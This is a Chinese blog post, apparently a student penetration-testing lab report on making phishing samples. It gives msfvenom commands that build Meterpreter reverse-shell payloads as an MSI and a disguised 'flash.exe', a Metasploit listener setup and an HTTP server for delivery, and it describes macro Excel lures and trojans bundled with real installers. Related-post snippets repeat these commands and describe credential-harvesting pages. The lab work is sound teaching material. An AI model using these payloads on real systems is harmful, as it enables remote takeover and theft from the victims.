渗透·实验五

最新推荐文章于 2024-07-22 11:03:49 发布
最新推荐文章于 2024-07-22 11:03:49 发布
阅读量154 收藏 3
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Gold_TANG/article/details/134889439
版权

一、实验目的

学会制作简单的钓鱼样本并理解钓鱼样本木马的工作原理.

二、实验任务

1.制作恶意的excel文件

2.将正常的软件和恶意木马进行捆绑打包

三、实验环境

1、靶机地址:192.168.85.130

2、攻击机地址:192.168.85.128

四、实验过程和实验结果

msf生成恶意的msi文件

msfvenom -p windows/meterpreter/reverse_tcp lhsot=192.168.85.128 lport=10493 -f msi -o diaoyexl.msi

然后msf建立监听

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.85.128

set lport 10493

启动 msf 监听

然后python在具有恶意的msi的文件夹下开启http服务,启动msi传输

python3 -m http.server 80

当目标访问excel且启用宏功能时,如下获取shell

制作msf木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhsot=192.168.85.128 lport=10493 -f exe -o flash.exe

按照要求把木马flash.exe和正常的安装包进行压缩,制作好捆绑木马

在win7虚拟机中运行,可以在任务管理器中看到,flash.exe被执行

在kali中建立监听,成功连接

五、实验总结

本次实验,我们学习了社会工程学钓鱼样本的制作,学习到了制作钓鱼文件并通过kali连接钓鱼文件获取权限。在Windows系统中,我们通过制作宏定义多重表,宏表内部添加恶意代码,我们将该excel宏表隐藏为正常的表传递给靶机,接着连接恶意代码后门,成功获取权限。另一种是创建压缩包,解压压缩包会执行我们的恶意文件,我们通过文件也能够获取到恶意文件。

Gold_TANG
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传渗透实验
xiongIT的博客
10-31 1461
文件上传渗透实验
网络渗透 社会工程学钓鱼样本的制作
natsumoe的博客
12-08 444
msfvenom -p windows/x64/meterpreter/reverse_tcp lhsot=kali的ip lport=监听的端口 -f msi -o diaoyexl.msi。msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=监听端口 -f exe -o flash.exe。这里解压前运行的是恶意远控木马,解压后运行的是正常的flash程序。然后python在具有恶意的msi的文件夹下开启http服务。
社会工程学实验
m0_74168970的博客
11-05 66
6)随后访问攻击机IP,并且点击这个生成的网址,这里访问的就是工具自动生成的网页,登录账号密码后攻击机就显示了账号密码,随后会跳转到goole网站的页面,但是并没有登录。5)需要首先填入攻击机的IP,填kali的IP即可,我的是192.168.234.129,回车随后选择模版,这里我选择goole模版,回车后监听开启。3)选择2)网站攻击向量,随后选择3)凭证收割机攻击方法,这里是使用给定的网站,以欺骗用户输入个人敏感信息,如用户名、密码等。2)选择1)进入社会工程学攻击模块。图1-6 浏览器访问页面。
网络渗透测试技术
m0_64112419的博客
12-09 997
只有深入了解目标用户的行为习惯、偏好和心理特点,我们才能制作出更具诱惑力和迷惑性的钓鱼样本,从而提高攻击的成功率。通过加强用户的安全培训和教育,提高他们对钓鱼攻击的识别能力和防范意识,可以有效降低钓鱼攻击的成功率,从而保护用户的信息安全。只有深入了解目标用户的行为特点和心理状态,我们才能更好地制作钓鱼样本,并增加其诱惑力,从而提高钓鱼攻击的成功率。因此,在进行钓鱼攻击前,我们需要投入更多的精力和时间来研究目标用户的行为习惯和心理特点,以确保钓鱼攻击的有效性和成功率。2.将正常的软件和恶意木马进行捆绑打包。
网络渗透测试实验
aarong的博客
10-04 933
实验目的:理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具: Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢复软件等 实验步骤: 1-5题为被动扫描,利用搜索引擎或相关网站 1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network securi
完整的内网渗透实验
balalawb的博客
11-07 206
内网渗透
网络渗透实验1
mny38450的博客
12-13 320
实验目的 理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 实验内容、原理 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具:Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢复软件等 3. 实验过程 1.用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档。 ...
渗透实验
yummy11111的博客
11-22 675
网络渗透实验实验目的: 1. 通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解TCP/IP协议中多种协议的数 据结构、通过实验了解HTTP等协议明文传输的特性。 2. 研究交换环境下的网络嗅探实现及防范方法,研究并利用ARP协议的安全漏洞,通过Arpspoof实现ARP欺骗以捕获内网其他用户 据。 3. 能利用BrupSuite实现网站登录暴力破解获得登录密码。 4. 能实现ZIP密码破解,理解安全密码的概念和设置。 系统环境:Kal
ISIS路由渗透实验
将勤补拙
12-07 8166
1.组网要求 网络中的6太路由器的配置了ISIS路由协议,AR1,AR2,作为Level-1路由器,AR3,AR4,作为Level-1/2路由器,属于Area10.。AR5,AR6作为 Level-2路由器属于Area20。除了 AR3上G0/0/1接口的开销值被设为40,其他所有接口的开销值都为缺省值10。要求将Leve2区域中的路由信息渗透到Leve|-1区域,使得 AR1到 Router的路...
Kali网络渗透实验
qq_45746876的博客
11-02 6359
文章目录前言环境搭建实验工具合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 通过信息的收集、一些安全工具的使用、搜索引擎的高效运用,完成网络渗透任务。 环境搭建 本次实验使用的系统环境为Kali Linux 2、Metasploitn
网络渗透实验一.docx
12-13
网络渗透实验】是网络安全领域的一个重要实践环节,主要目的是理解和掌握网络侦察、扫描等基本技术,以及如何利用这些技术进行安全评估。本实验通过实际操作,帮助学习者熟悉常用的渗透测试工具,如搜索引擎、NMAP...
渗透实验报告4.docx
12-13
在这个桂林电子科技大学的2021-2022学年第一学期的实验中,学生们通过渗透实验了解CTF(Capture The Flag)竞赛模式,这是一种网络安全竞赛,涉及MISC(Miscellaneous)、PPC(Pwnable)、WEB等不同领域的知识。...
靶机数据窃取渗透实验.zip
07-03
实验“靶机数据窃取渗透实验”旨在模拟黑客攻击过程,揭示数据安全的脆弱性,并提供防范措施的学习机会。 首先,我们要了解渗透测试。渗透测试是一种授权的安全测试,目的是评估计算机系统、网络或应用程序的安全...
网络渗透测试实验一.docx
12-03
"网络渗透测试实验一" 本实验旨在让学生理解网络扫描和网络侦察的作用,并通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用。实验中使用了Kali Linux 2和Windows网络环境,Metasploitable2虚拟机...
【Socket 编程】基于UDP协议建立多人聊天室
稻草人敲代码的博客
07-19 442
对于服务端来说,除了要接收消息之外,还要实现一个路由转发模块,该路由转发模块可以将相应发送给所有连接的客户端。而对于客户端来说,除了要发送消息给聊天室,还要能实时看到其它所有客户端的消息。下面来看看具体实现的代码,代码只给出核心模块,其余代码模块代码可以借鉴我之前的博客。具体来说,服务器类实现的功能只有收消息。
docker build时的网络问题
flynetcn的专栏
07-19 395
docker build网络问题
【ROS2】演示:为有损网络使用服务质量设置
最新发布
cxyhjl的博客
07-22 704
目录背景先决条件运行演示命令行选项添加网络流量背景请阅读有关 QoS 设置的文档页面,以获取有关 ROS 2 中可用支持的背景信息。在这个演示中,我们将生成一个发布相机图像的节点和另一个订阅图像并在屏幕上显示图像的节点。然后,我们将模拟它们之间的丢包网络连接,并展示不同的服务质量设置如何处理不良链接。先决条件本教程假设您已安装并运行 ROS 2 和 OpenCV。有关安装说明,请...
安徽京准:NTP网络时间服务器的几种应用场景
NTP授时服务器
07-19 231
安徽京准:NTP网络时间服务器的几种应用场景
centos渗透实验
09-07
对于CentOS渗透实验,我可以提供一些基本的指导和建议。请注意,进行渗透实验可能涉及非法活动,因此在进行任何实验之前,请确保您已获得所有必要的授权和许可。 在进行CentOS渗透实验之前,请确保您已掌握以下基础...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值